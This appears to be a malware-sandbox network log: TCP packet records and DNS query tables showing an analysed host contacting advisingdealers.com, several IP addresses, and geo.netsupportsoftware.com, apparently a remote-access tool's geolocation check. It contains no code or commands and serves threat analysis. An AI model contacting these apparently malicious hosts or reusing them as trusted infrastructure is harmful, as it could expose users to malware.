                                                                                                                      Sep 7, 2023 18:19:24.684957027 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.685030937 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.685287952 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.685359001 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.685606003 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.685684919 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.686150074 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.686228991 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.686547995 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.686630964 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.686861038 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.686937094 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.687285900 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.687369108 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.687582970 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.687657118 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.687953949 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.688038111 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.688366890 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.688448906 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.688704014 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.688787937 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.689042091 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.689120054 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.689371109 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.689450979 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.689747095 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.689850092 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.690079927 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.690155029 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.690476894 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.690561056 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.690947056 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.691031933 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.691391945 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.691479921 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.691834927 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.691911936 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.692181110 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.692256927 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.692495108 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.692567110 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.692861080 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.692936897 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.693203926 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.693293095 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.693684101 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.693763018 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.693970919 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.694044113 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.694340944 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.694422960 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.694760084 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.694840908 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.695148945 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.695226908 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.695434093 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.695506096 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.695816994 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.695897102 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.696190119 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.696290016 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.696634054 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.696707964 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.697060108 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.697138071 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.697491884 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.697567940 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.697880983 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.697964907 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.698276043 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.698425055 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.698709965 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.698788881 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.699076891 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.699148893 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.699405909 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.699489117 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.699747086 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.699822903 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.700088978 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.700166941 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.700417042 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.700488091 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.700752020 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.700822115 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.701072931 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.701145887 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.701385975 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.701456070 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.701772928 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.701850891 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.702152967 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.702258110 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.702565908 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.702651978 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.703088999 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.703170061 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.703438044 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.703507900 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.703910112 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.703990936 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.704288960 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.704364061 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.704715014 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.704793930 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.705039024 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.705111980 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.705375910 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.705454111 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.705694914 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.705775023 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.706182957 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.706267118 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.706509113 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.706584930 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.706842899 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.706913948 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.707160950 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.707233906 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.707623005 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.707696915 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.707937956 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.708013058 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.708302975 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.708379984 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.896666050 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.896858931 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.896915913 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.896979094 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.897347927 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.897445917 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.897454977 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.897474051 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.897511959 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.897528887 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.897599936 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.897603989 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.897619009 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.897656918 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.897680044 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.897846937 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.897911072 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.898431063 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.898521900 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.898855925 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.898948908 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.899108887 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.899179935 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.899188995 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.899204969 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.899234056 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.899235964 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.899260044 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.899265051 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.899293900 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.899328947 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.900077105 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.900181055 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.900319099 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.900378942 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.900397062 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.900404930 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.900443077 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.900444984 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.900461912 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.900494099 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.900520086 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:24.900635958 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:24.900715113 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:25.082022905 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:25.082109928 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:25.082140923 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:25.082169056 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:25.082196951 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:25.082214117 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:25.082225084 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:25.082252979 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:25.082261086 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:25.082283974 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:25.083281994 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:25.083384037 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:25.083398104 CEST44349722162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:25.083448887 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:25.083857059 CEST49722443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:30.844728947 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:30.844788074 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:30.844903946 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:30.845490932 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:30.845516920 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.231982946 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.234950066 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.234989882 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.613826036 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.613871098 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.614053965 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.614072084 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.614121914 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.717173100 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.803231955 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.803260088 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.803318977 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.803441048 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.803502083 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.803606987 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.803620100 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.803642035 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.803678989 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.803726912 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.803993940 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.804006100 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.804107904 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.846735954 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.846832991 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.846955061 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.846980095 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.992827892 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.992902994 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.993045092 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.993094921 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.993128061 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.993211985 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.993510008 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.993607044 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:31.993863106 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:31.993957996 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:32.034576893 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:32.034766912 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:32.035604000 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:32.035753012 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:32.036204100 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:32.036345005 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:32.181617022 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:32.181745052 CEST44349729162.215.249.83192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:32.181885958 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:32.182359934 CEST49729443192.168.2.6162.215.249.83
                                                                                                                      Sep 7, 2023 18:19:39.551820993 CEST49730443192.168.2.65.252.178.51
                                                                                                                      Sep 7, 2023 18:19:39.551908970 CEST443497305.252.178.51192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:39.552016020 CEST49730443192.168.2.65.252.178.51
                                                                                                                      Sep 7, 2023 18:19:39.634902954 CEST49730443192.168.2.65.252.178.51
                                                                                                                      Sep 7, 2023 18:19:39.634952068 CEST443497305.252.178.51192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:39.635059118 CEST443497305.252.178.51192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:41.896104097 CEST4973180192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:42.204207897 CEST804973162.172.138.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:42.204401016 CEST4973180192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:42.331034899 CEST4973180192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:42.642007113 CEST804973162.172.138.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:42.642103910 CEST4973180192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:42.642222881 CEST4973180192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:42.655378103 CEST4973280192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:42.949784040 CEST804973162.172.138.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:42.976608038 CEST804973262.172.138.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:42.976735115 CEST4973280192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:42.977366924 CEST4973280192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:43.301371098 CEST804973262.172.138.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:43.301526070 CEST4973280192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:43.301671028 CEST4973280192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:43.303683043 CEST4973780192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:43.622859955 CEST804973262.172.138.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:43.624995947 CEST804973762.172.138.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:43.625214100 CEST4973780192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:43.625535965 CEST4973780192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:43.949589968 CEST804973762.172.138.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:43.949769020 CEST4973780192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:43.950058937 CEST4973780192.168.2.662.172.138.8
                                                                                                                      Sep 7, 2023 18:19:44.271240950 CEST804973762.172.138.8192.168.2.6
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Sep 7, 2023 18:19:18.099230051 CEST5439453192.168.2.68.8.8.8
                                                                                                                      Sep 7, 2023 18:19:18.366988897 CEST5198453192.168.2.68.8.8.8
                                                                                                                      Sep 7, 2023 18:19:22.007092953 CEST5472353192.168.2.68.8.8.8
                                                                                                                      Sep 7, 2023 18:19:22.259088993 CEST53547238.8.8.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:22.297043085 CEST5159653192.168.2.68.8.8.8
                                                                                                                      Sep 7, 2023 18:19:22.566457033 CEST53515968.8.8.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:30.383922100 CEST5380753192.168.2.68.8.8.8
                                                                                                                      Sep 7, 2023 18:19:30.636286974 CEST53538078.8.8.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:30.640156984 CEST5803753192.168.2.68.8.8.8
                                                                                                                      Sep 7, 2023 18:19:30.843625069 CEST53580378.8.8.8192.168.2.6
                                                                                                                      Sep 7, 2023 18:19:41.381949902 CEST5306153192.168.2.68.8.8.8
                                                                                                                      Sep 7, 2023 18:19:41.597474098 CEST53530618.8.8.8192.168.2.6
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Sep 7, 2023 18:19:18.099230051 CEST192.168.2.68.8.8.80xcaStandard query (0)duet-cdn.vox-cdn.comA (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:18.366988897 CEST192.168.2.68.8.8.80xc6c5Standard query (0)duet-cdn.vox-cdn.comA (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:22.007092953 CEST192.168.2.68.8.8.80x2924Standard query (0)www.advisingdealers.comA (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:22.297043085 CEST192.168.2.68.8.8.80xa9deStandard query (0)www.advisingdealers.comA (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:30.383922100 CEST192.168.2.68.8.8.80x9be7Standard query (0)www.advisingdealers.comA (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:30.640156984 CEST192.168.2.68.8.8.80x2c1dStandard query (0)www.advisingdealers.comA (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:41.381949902 CEST192.168.2.68.8.8.80x8e0Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Sep 7, 2023 18:19:18.317260027 CEST8.8.8.8192.168.2.60xcaNo error (0)duet-cdn.vox-cdn.comn.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:18.570288897 CEST8.8.8.8192.168.2.60xc6c5No error (0)duet-cdn.vox-cdn.comn.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:22.259088993 CEST8.8.8.8192.168.2.60x2924No error (0)www.advisingdealers.comadvisingdealers.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:22.259088993 CEST8.8.8.8192.168.2.60x2924No error (0)advisingdealers.com162.215.249.83A (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:22.566457033 CEST8.8.8.8192.168.2.60xa9deNo error (0)www.advisingdealers.comadvisingdealers.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:22.566457033 CEST8.8.8.8192.168.2.60xa9deNo error (0)advisingdealers.com162.215.249.83A (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:30.636286974 CEST8.8.8.8192.168.2.60x9be7No error (0)www.advisingdealers.comadvisingdealers.comCNAME (Canonical name)IN (0x0001)false
